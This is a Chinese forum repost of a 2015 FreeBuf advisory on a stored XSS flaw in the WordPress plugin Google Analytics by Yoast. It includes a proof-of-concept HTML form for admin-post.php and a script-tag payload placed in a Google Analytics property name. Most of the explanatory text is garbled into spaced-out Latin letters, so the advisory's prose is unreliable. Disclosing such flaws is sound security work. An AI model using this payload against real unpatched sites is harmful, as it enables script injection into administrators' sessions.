搜索

[8779] 2015-03-23_WordPress插件GoogleAnalyticsbyYoast存储型XSS漏洞(含POC)

文档创建者:s7ckTeam
浏览次数:83
最后更新:2025-01-17
2015-03-23_WordPress插件GoogleAnalyticsbyYoast存储型XSS漏洞(含POC) W o r d P r e s s G o o g l e   A n a l y t i c s   b y   Y o a s t X S S P O C F r e e B u f   2 0 1 5 - 0 3 - 2 3 f r e e b u f W o r d P r e s s G o o g l e   A n a l y t i c s   b y   Y o a s t X S S W o r d P r e s s H T M L J a v a S c r i p t J a v a S c r i p t G o o g l e   A n a l y t i c s   b y   Y o a s t W o r d P r e s s 7 W P 2 0 1 4 Y o a s t   W P W P / P H P ( ) 1 K l i k k i   O y 访 O A u t h 2 G o o g l e 使 G o o g l e H T M L G o o g l e H T M L G o o g l e < s c r i p t > H T M L W o r d P r e s s
P O C H T M L 使 G o o g l e : < a   h r e f = " h t t p : / / Y O U R . B L O G / w p - a d m i n / a d m i n - p o s t . p h p ? r e a u t h = 1 " > r e a u t h < / a > < b r > < b r > < f o r m   m e t h o d = P O S T   a c t i o n = " h t t p : / / Y O U R . B L O G / w p - a d m i n / a d m i n - p o s t . p h p " > < i n p u t   t y p e = t e x t   s i z e = 1 0 0   n a m e = " g o o g l e _ a u t h _ c o d e " > < i n p u t   t y p e = s u b m i t > < / f o r m > " " g o o g l e . c o m   O A u t h G o o g l e G o o g l e ( h t t p s : / / w w w . g o o g l e . c o m / a n a l y t i c s / w e b / ? h l = e n # m a n a g e m e n t / S e t t i n g s / ) p a y l o a d t e s t " > < s c r i p t > a l e r t ( ' s t o r e d   X S S ' ) < / s c r i p t > 使 s r c 使 a j a x 使 P H P Y o a s t 2 0 1 5 3 1 8 Y o a s t ( 5 . 3 . 3 ) K l i k k i   O y / S p h i n x F r e e b u f F r e e B u f . C O M

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理